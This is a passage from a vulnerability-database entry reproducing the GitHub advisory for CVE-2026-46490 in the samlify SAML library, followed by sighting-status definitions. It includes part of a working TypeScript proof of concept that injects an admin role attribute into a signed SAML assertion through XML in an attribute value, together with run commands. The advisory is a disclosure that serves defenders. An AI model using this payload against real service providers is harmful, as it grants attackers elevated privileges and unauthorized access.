\u0027\u003c/saml:AttributeValue\u003e\u003c/saml:Attribute\u003e\u0027,\n    \u0027\u003csaml:Attribute Name=\"role\" NameFormat=\"urn:oasis:names:tc:SAML:2.0:attrname-format:basic\"\u003e\u0027,\n    \u0027\u003csaml:AttributeValue xmlns:xs=\"http://www.w3.org/2001/XMLSchema\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:type=\"xs:string\"\u003eadmin\u003c/saml:AttributeValue\u003e\u0027,\n    \u0027\u003c/saml:Attribute\u003e\u0027,\n    \u0027\u003csaml:Attribute Name=\"injection\" NameFormat=\"urn:oasis:names:tc:SAML:2.0:attrname-format:basic\"\u003e\u0027,\n    \u0027\u003csaml:AttributeValue xmlns:xs=\"http://www.w3.org/2001/XMLSchema\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:type=\"xs:string\"\u003esafe\u0027\n  ].join(\u0027\u0027);\n\n  const user = { email: \u0027user@esaml2.com\u0027, injection };\n  const { context: SAMLResponse } = await idp.createLoginResponse(\n    sp,\n    { extract: { request: { id: \u0027request-id\u0027 } } },\n    \u0027post\u0027,\n    user,\n    buildTemplate(idp, sp, \u0027post\u0027, user)\n  );\n\n  const xml = util.base64Decode(SAMLResponse, true).toString();\n  console.log(\u0027--- Generated XML snippet ---\u0027);\n  console.log(xml.slice(xml.indexOf(\u0027\u003csaml:AttributeStatement\u0027), xml.indexOf(\u0027\u003c/saml:AttributeStatement\u003e\u0027) + 26));\n\n  const { extract } = await sp.parseLoginResponse(idp, \u0027post\u0027, { body: { SAMLResponse } });\n\n  console.log(\u0027Parsed attributes:\u0027, extract.attributes);\n}\n\nmain().catch(err =\u003e {\n  console.error(\u0027PoC failed:\u0027, err?.message || err);\n  process.exitCode = 1;\n});\n```\n\n**Run:**\n\n```\n  npm install --legacy-peer-deps\n  npx ts-node poc/attribute_injection.ts\n```\n\n## Impact \n\nA normal user can inject arbitrary attributes (e.g., `role=admin`) into a signed assertion and have them parsed by `sp.parseLoginResponse()`. This can grant elevated privileges in SPs that trust SAML attributes.",
  "id": "GHSA-34r5-q4jw-r36m",
  "modified": "2026-06-09T13:12:28Z",
  "published": "2026-05-21T17:14:07Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/tngan/samlify/security/advisories/GHSA-34r5-q4jw-r36m"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-46490"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/tngan/samlify"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "samlify: XML Injection in AttributeValue Allows Privilege Escalation in Signed SAML Assertions"
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-46490 (GCVE-0-2026-46490)

FKIE_CVE-2026-46490

GHSA-34R5-Q4JW-R36M

Summary

Root Cause

Proof-of-concept

Impact

Tags

Sightings

Nomenclature